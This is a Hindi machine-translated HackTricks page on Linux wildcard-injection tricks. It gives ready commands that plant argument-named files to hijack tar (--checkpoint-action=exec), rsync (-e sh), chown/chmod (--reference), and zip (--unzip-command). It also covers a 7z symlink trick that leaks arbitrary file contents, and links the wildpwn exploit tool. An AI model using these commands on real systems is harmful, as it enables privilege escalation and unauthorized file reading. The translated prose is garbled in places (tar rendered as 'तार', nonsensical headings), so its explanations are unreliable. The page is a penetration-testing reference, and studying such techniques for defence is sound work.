Wildcards Spare tricks

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

दूसरे तरीके HackTricks का समर्थन करने के लिए:

chown, chmod

आप इंडिकेट कर सकते हैं कि आप बाकी फ़ाइलों के लिए किस फ़ाइल के मालिक और अनुमतियाँ कॉपी करना चाहते हैं

touch "--reference=/my/own/path/filename"

आप इसे इस्तेमाल करके एक्सप्लॉइट कर सकते हैं https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (संयुक्त हमला) अधिक जानकारी https://www.exploit-db.com/papers/33930

तार

क्रियात्मक आदेशों को निषेधित करें:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

आप इसे एक्सप्लॉइट कर सकते हैं https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar attack) अधिक जानकारी के लिए https://www.exploit-db.com/papers/33930

Rsync

क्रियाएँ विचारात्मक रूप से निष्पादित करें:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

आप इसे https://github.com/localh0t/wildpwn/blob/master/wildpwn.py का उपयोग करके एक्सप्लॉइट कर सकते हैं (rsync अटैक) अधिक जानकारी https://www.exploit-db.com/papers/33930 में मिलेगी

7z

7z में -- का उपयोग करके * से पहले भी (ध्यान दें कि -- का अर्थ है कि आगे दी गई इनपुट को पैरामीटर के रूप में नहीं लिया जा सकता है, इसलिए इस मामले में केवल फ़ाइल पथ हैं) आप किसी भी त्रुटि को पढ़ने के लिए एक अविचित्रित त्रुटि का कारण बना सकते हैं, इसलिए यदि रूट द्वारा निम्नलिखित एक कमांड को निष्पादित किया जा रहा है:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

और आप इस फ़ोल्डर में फ़ाइलें बना सकते हैं जहाँ यह चलाया जा रहा है, आप @root.txt फ़ाइल और root.txt फ़ाइल बना सकते हैं जो आपको पढ़ना चाहते हैं की फ़ाइल का symlink हो।

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

फिर, जब 7z को चलाया जाएगा, तो यह root.txt को एक फ़ाइल के रूप में देखेगा जिसमें यह सूची होगी कि वह कौन सी फ़ाइलें संकुचित करनी चाहिए (जिसका मतलब है कि @root.txt का मौजूद होना) और जब 7z root.txt को पढ़ेगा तो यह /file/you/want/to/read पढ़ेगा और जैसा कि इस फ़ाइल की सामग्री फ़ाइलों की सूची नहीं है, इसे त्रुटि दिखाएगा जो सामग्री है।

बॉक्स CTF के व्रिट-अप्स में अधिक जानकारी है।

Zip

क्रमांक आदेशित कमांड चलाएं:

zip name.zip files -T --unzip-command "sh -c whoami"
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

दूसरे तरीके HackTricks का समर्थन करने के लिए:

Last updated